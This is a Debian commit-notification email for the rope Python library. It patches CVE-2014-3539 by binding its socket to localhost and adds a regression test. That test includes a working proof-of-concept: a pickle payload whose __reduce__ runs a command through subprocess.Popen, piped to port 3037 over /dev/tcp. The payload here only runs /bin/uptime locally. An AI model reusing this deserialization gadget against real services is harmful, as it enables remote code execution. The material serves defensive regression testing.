[Python-modules-commits] [rope] 03/11: Mitigations for CVE-2014-3539 from the upstream author personal repository (https://github.com/mcepl/rope):

Arnaud Fontaine arnau at moszumanska.debian.org
Thu Apr 13 08:52:43 UTC 2017 

This is an automated email from the git hooks/post-receive script.

arnau pushed a commit to branch debian-experimental
in repository rope.

commit da4b3278b40a1cf16798771e5b67d918d8693393
Author: Arnaud Fontaine <arnau at debian.org>
Date:   Thu Jan 26 13:38:11 2017 +0900

    Mitigations for CVE-2014-3539 from the upstream author personal repository
    (https://github.com/mcepl/rope):
    
      commit a2ea5f98d18ed037090afb048a48f87b515ff8dc
      Author: Matěj Cepl <mcepl at cepl.eu>
      Date:   Tue Feb 10 12:34:20 2015 +0100
    
          Just add reporter’s suggested reproducer
    
      commit a6cb534debe9aff623b6b19ae2dedbf872069a50
      Author: Matej Cepl <mcepl at cepl.eu>
      Date:   Thu Feb 12 01:12:15 2015 +0100
    
          limit socket connections to localhost
    
    Patch-Name: CVE-2014-3539.patch
---
 rope/base/oi/doa.py                      |  2 +-
 ropetest/CVE20143539/CVE-2014-3539.py    | 18 ++++++++++++++++++
 ropetest/CVE20143539/README.md           | 17 +++++++++++++++++
 ropetest/CVE20143539/__init__.py         | 32 ++++++++++++++++++++++++++++++++
 ropetest/CVE20143539/generate_payload.py |  8 ++++++++
 ropetest/CVE20143539/payload.txt         |  9 +++++++++
 ropetest/CVE20143539/project/hello.py    |  1 +
 ropetest/CVE20143539/run_reproducer.sh   | 11 +++++++++++
 ropetest/__init__.py                     |  3 +++
 9 files changed, 100 insertions(+), 1 deletion(-)

diff --git a/rope/base/oi/doa.py b/rope/base/oi/doa.py
index 3f314c6..65e3e26 100644
--- a/rope/base/oi/doa.py
+++ b/rope/base/oi/doa.py
@@ -116,7 +116,7 @@ class _SocketReceiver(_MessageReceiver):
         self.data_port = 3037
         while self.data_port < 4000:
             try:
-                self.server_socket.bind(('', self.data_port))
+                self.server_socket.bind(('127.0.0.1', self.data_port))
                 break
             except socket.error:
                 self.data_port += 1
diff --git a/ropetest/CVE20143539/CVE-2014-3539.py b/ropetest/CVE20143539/CVE-2014-3539.py
new file mode 100644
index 0000000..5dd37e1
--- /dev/null
+++ b/ropetest/CVE20143539/CVE-2014-3539.py
@@ -0,0 +1,18 @@
+#!/usr/bin/env python
+# CVE-2014-3539 reproducer/exploit
+# Vasyl Kaigorodov <vkaigoro at redhat.com>
+# Tested on Python 2.7.x
+
+import sys
+from rope.base import project
+
+try:
+    open('payload.txt', 'r')
+except IOError:
+    print("payload.txt not found, run:")
+    print("\tpython generate_payload.py")
+    sys.exit(1)
+
+myproject = project.Project('project/')
+res = myproject.get_resource("hello.py")
+myproject.pycore.run_module(res)
diff --git a/ropetest/CVE20143539/README.md b/ropetest/CVE20143539/README.md
new file mode 100644
index 0000000..5c620ef
--- /dev/null
+++ b/ropetest/CVE20143539/README.md
@@ -0,0 +1,17 @@
+== List of files ==
+
+project/			- directory containing an example python module
+CVE-2014-3539.py	- python script which tries to load an example python module
+				      for re-factoring (normal workflow simulation)
+generate_payload.py - generates payload.txt (evil code to run)
+payload.txt			- example payload (running /bin/uptime)
+run_reproducer.sh	- main file that sticks above together
+
+== Usage ==
+
+Run ./run_reproducer.sh.
+If the system is vulnerable, you'll see the output similar to below:
+
+  $ ./run_reproducer.sh
+  SUCCESS:  15:13:46 up 21:26, 2 users,  load average: 0.02, 0.63, 1.01
+
diff --git a/ropetest/CVE20143539/__init__.py b/ropetest/CVE20143539/__init__.py
new file mode 100644
index 0000000..3ab3be6
--- /dev/null
+++ b/ropetest/CVE20143539/__init__.py
@@ -0,0 +1,32 @@
+import os.path
+import subprocess
+try:
+    import unittest2 as unittest
+except ImportError:
+    import unittest
+
+
+class TestCVE20143539(unittest.TestCase):
+    def test_case(self):
+        cur_dir = os.path.dirname(__file__)
+        script_name = os.path.join(cur_dir, 'run_reproducer.sh')
+        pid = subprocess.Popen([script_name], stdout=subprocess.PIPE,
+                               stderr=subprocess.PIPE, cwd=cur_dir)
+        pid.communicate()
+        self.assertEquals(pid.returncode, 0)
+
+
+def suite():
+    result = unittest.TestSuite()
+    result.addTests(unittest.makeSuite(TestCVE20143539))
+    return result
+
+
+if __name__ == '__main__':
+    import sys
+    if len(sys.argv) > 1:
+        unittest.main()
+    else:
+        runner = unittest.TextTestRunner()
+        res = runner.run(suite())
+        sys.exit(not res.wasSuccessful())
diff --git a/ropetest/CVE20143539/generate_payload.py b/ropetest/CVE20143539/generate_payload.py
new file mode 100644
index 0000000..c8d3e01
--- /dev/null
+++ b/ropetest/CVE20143539/generate_payload.py
@@ -0,0 +1,8 @@
+import cPickle
+import subprocess
+
+class RunBinSh(object):
+  def __reduce__(self):
+    return (subprocess.Popen, (('/bin/uptime',),))
+
+open('payload.txt', 'w').write(cPickle.dumps(RunBinSh()))
diff --git a/ropetest/CVE20143539/payload.txt b/ropetest/CVE20143539/payload.txt
new file mode 100644
index 0000000..434dd0f
--- /dev/null
+++ b/ropetest/CVE20143539/payload.txt
@@ -0,0 +1,9 @@
+csubprocess
+Popen
+p1
+((S'/bin/uptime'
+p2
+tp3
+tp4
+Rp5
+.
\ No newline at end of file
diff --git a/ropetest/CVE20143539/project/hello.py b/ropetest/CVE20143539/project/hello.py
new file mode 100644
index 0000000..7df869a
--- /dev/null
+++ b/ropetest/CVE20143539/project/hello.py
@@ -0,0 +1 @@
+print("Hello, World!")
diff --git a/ropetest/CVE20143539/run_reproducer.sh b/ropetest/CVE20143539/run_reproducer.sh
new file mode 100644
index 0000000..b1f7fac
--- /dev/null
+++ b/ropetest/CVE20143539/run_reproducer.sh
@@ -0,0 +1,11 @@
+#!/bin/bash
+export PYTHONPATH=$(readlink -f ../..):$PYTHONPATH
+trap "killall -- $(basename $0)" EXIT
+
+(while : ; do
+    ( cat payload.txt > /dev/tcp/0.0.0.0/3037; ) &>/dev/null \
+        && echo -n "SUCCESS: "
+done)&
+
+python CVE-2014-3539.py 2>/dev/null
+exit $?
diff --git a/ropetest/__init__.py b/ropetest/__init__.py
index 699f8c6..d2e3aaf 100644
--- a/ropetest/__init__.py
+++ b/ropetest/__init__.py
@@ -20,6 +20,8 @@ import ropetest.simplifytest
 import ropetest.contrib
 import ropetest.refactor
 
+import ropetest.CVE20143539
+
 
 def suite():
     result = unittest.TestSuite()
@@ -38,6 +40,7 @@ def suite():
 
     result.addTests(ropetest.refactor.suite())
     result.addTests(ropetest.contrib.suite())
+    result.addTests(ropetest.CVE20143539.suite())
 
     return result
 

-- 
Alioth's /usr/local/bin/git-commit-notice on /srv/git.debian.org/git/python-modules/packages/rope.git

More information about the Python-modules-commits mailing list